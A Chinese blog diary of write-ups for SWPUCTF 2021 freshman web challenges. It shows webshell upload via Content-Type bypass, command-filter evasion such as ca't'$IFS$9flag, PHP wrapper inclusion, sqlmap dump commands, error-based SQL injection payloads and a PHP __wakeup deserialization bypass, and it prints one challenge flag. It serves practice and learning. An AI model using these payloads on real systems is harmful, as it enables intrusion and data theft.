刷题学习日记（1）

刷题学习日记（1） - SWPUCTF

写这篇文章主要是想看看自己一个下午能干啥，不想老是浪费时间了，所以刷多少题我就会写多少题解，使用nss随机刷题，但是今天下午不知道为啥一刷都是SWPUCTF的。

[SWPUCTF 2021 新生赛]gift_F12

控制台ctrl+f搜索flag即可，得到flag

[SWPUCTF 2021 新生赛]caidao

怎么做写脸上了，直接连，

[SWPUCTF 2021 新生赛]jicao

<?php highlight_file('index.php'); include("flag.php"); $id=$_POST['id']; $json=json_decode($_GET['json'],true); if ($id=="wllmNB"&&$json['x']=="wllm") {echo $flag;} ?>

//阅读一下源码：可以看到要输出flag要满足POST传入id=wllmNB，GET传入json字符串经过解码后要满足$json['x']=="wllm"，GET传入{"x":"wllm"}即可
NSSCTF{95d74e97-b06c-4fb2-b028-bb3a0ab2686c}

[SWPUCTF 2021 新生赛]Do_you_know_http

使用hackbar传入User-Agent ：WLLM即可

第二关传入X-Forwarded-For ：127.0.0.1 即可

[SWPUCTF 2021 新生赛]easy_md5

一个很简单的md5

[SWPUCTF 2021 新生赛]easyupload1.0

传个一句话木马试试

应该是给php后缀搬掉了，试试phtml，也搬掉了，不太行，传个图片

图片可以正常上传猜测检测字段Content-Type:

直接改个php试试

上传成功。

直接连接了，然后虚拟终端打开找找flag

找到了，但是上传之后竟然是错误的，看了wp后说要在phpinfo里面找，这个没想到

[SWPUCTF 2021 新生赛]nc签到

看题目直接拿vps nc一下吧

黑名单搬了一点

看看路径，可以使用l's'这样的方式绕过查看一下flag

ca't'$IFS$9flag

当然我们使用nl也是可以的

[SWPUCTF 2021 新生赛]easyupload2.0

直接蚁剑连接即可

[SWPUCTF 2021 新生赛]easyrce

没有任何限制直接RCE就行

[SWPUCTF 2021 新生赛]babyrce

加个cookie下一关出来了

空格过滤了直接${IFS}或者$IFS$9绕过

[SWPUCTF 2021 新生赛]ez_unserialize

开题没告诉题目开源码，意图明显，访问/robots.txt

找到目录

找到题目，解析一下，当类销毁的时候如果amdin=admin，passwd=ctf那么就输出flag，思路有了生成对象p的时候直接赋值对象p的admin和passwd属性即可

[SWPUCTF 2021 新生赛]include

给了个提示

经过包含发现没包含出来，搜了一下include_once函数的用法

说明flag.php已经被包含过了，那我们使用php伪协议将flag的base64直接输出，然后解码即可

[SWPUCTF 2021 新生赛]error

搜索框输入1，写没有提示？看看源码

看到源码给出提示

直接跑sqlmap

python sqlmap.py -u ”url" --dbs

python sqlmap.py -u “url” test_db --tables

python sqlmap.py -u “url” -D test_db -T test_tb --columns

python sqlmap.py -u “url” -D test_db -T test_tb -C flag --dump

这里是报错注入，SELECT * FROM users WHERE id='$id' LIMIT 0,1可以看到给了语句

直接进行报错注入：1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))-- 原理：

SELECT * FROM users WHERE id='$id' LIMIT 0,1

SELECT * FROM users WHERE id='1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT database()), 0x7e))--' LIMIT 0,1

--后面的明显被注释了，

EXTRACTVALUE：

它的正常用法是从一个合法的 XML 文档中，按照给定的 XPath 语法规则，提取匹配的节点值。然而，当提供的 XML 或 XPath 是非法的或者不符合格式时

CONCAT(0x7e, (SELECT database()), 0x7e)：将当前的数据库名称与两个 ~ 符号（十六进制 0x7e 表示的 ~）拼接。SELECT database() 会返回当前使用的数据库名称。
EXTRACTVALUE(1, ...)：由于传递的参数不是有效的 XML 数据格式，EXTRACTVALUE() 会触发一个错误。这个错误的详细信息可能包含我们拼接的数据库名称，这样就通过报错信息泄露了敏感数据。

数据库名出来了；

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT table_name FROM information_schema.tables WHERE table_schema='test_db' LIMIT 0,1), 0x7e))-- -

跑出来表名

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT column_name FROM information_schema.columns WHERE table_name='test_tb' and table_schema='test_db' LIMIT 1,1), 0x7e))-- -

跑出来个flag列

直接拿出flag

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT flag FROM test_tb LIMIT 0,1), 0x7e))-- -

出了一半，

再找下一半应该是放不下了从右往左找试试

?id=1' AND EXTRACTVALUE(1, CONCAT(0x7e, (SELECT left(flag,30) FROM test_tb LIMIT 0,1), 0x7e))-- -

可以看到最多输出30位，输入31后后面的波浪号没了

把这两个找出来的flag整合一下即可

把这两个整合一下flag

[SWPUCTF 2021 新生赛]no_wakeup

小派蒙给了一个class.php,打开看看

是一个反序列化的题目，分析一下，当对象被反序列化的时候会自动调用wakeup魔术方法，意思是我们传入这一串O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}的时候passwd会变成SHA1(wllm)这样会导致我们不能满足条件,这题意图比较明显了，就是wakeup绕过，怎么绕过呢？

参考两篇文章：我感觉写的很好

PHP反序列化中wakeup()绕过总结 – fushulingのblog

PHP反序列化

我们这里直接把元素数改为3就可以绕过，为什么呢？

因为当传入数据被反序列化时因为多了一个元素但是找不到元素然后就不能完成整个反序列化的过程导致中途exit所以wakeup调用不了